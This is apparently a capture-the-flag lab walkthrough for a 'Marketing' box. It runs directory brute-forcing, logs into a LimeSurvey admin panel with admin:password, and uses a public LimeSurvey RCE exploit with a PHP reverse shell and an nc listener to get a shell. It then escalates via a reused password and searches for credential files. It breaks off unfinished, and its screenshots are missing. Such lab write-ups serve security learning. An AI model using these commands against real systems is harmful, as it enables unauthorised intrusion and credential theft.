80

Running feroxbuster we discover /old/:
feroxbuster -u http://192.168.182.225/ -C 404,400 -A --wordlist '/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt' -B --auto-tuneNow to check the difference:
curl http://marketing.pg/old/ > old.txt
curl http://marketing.pg/ > new.txt
diff old.txt new.txt
This seems new.
Adding to /etc/hosts
http://customers-survey.marketing.pg/: 
At /admin:
We can try admin:password
Now we are logged in: 
Using this exploit:
git clone https://github.com/Y1LD1R1M-1337/Limesurvey-RCE.git
cd Limesurvey-RCENow editing php-rev.php: 
We can zip this now:
zip Y1LD1R1M.zip config.xml php-rev.phpNow we can change the path at exploit.py: ![]()
Now we can run it after running listener:
sudo rlwrap nc -nlvp 80python3 exploit.py http://customers-survey.marketing.pg/ admin password 80We get a shell: 
Running linpeas:
We discover a password.
Using this password on both users in /home:

We are t.miller now.
Running sudo -l:

Checking id:
We are in mlocate group
Now we can find files owned by group mlocate:
find / -group mlocate 2>/dev/null
We find a file called creds-for-2022.txt
Ughhhh didnt work will try later
Last updated
Was this helpful?